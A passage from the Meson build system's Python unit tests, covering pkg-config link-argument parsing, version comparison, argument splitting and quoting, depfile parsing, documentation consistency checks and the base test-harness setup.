self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
for s1, s2 in zip(sections[:], sections[1:]):
if s1.group(1) == "Universal options":
# Extract the content for this section
end = s2.start() if s2 is not None else len(md)
content = md[s1.end():end]
subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
for sub1, sub2 in zip(subsections[:], subsections[1:]):
if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
# Extract the content for this subsection
sub_end = sub2.start() if sub2 is not None else len(content)
subcontent = content[sub1.end():sub_end]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(len(found_entries & arches), 0)
found_entries |= arches
break
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
for s1, s2 in zip(sections[::2], sections[1::2]):
if s1.group(1) == "CPU families":
# Extract the content for this section
content = md[s1.end():s2.start()]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
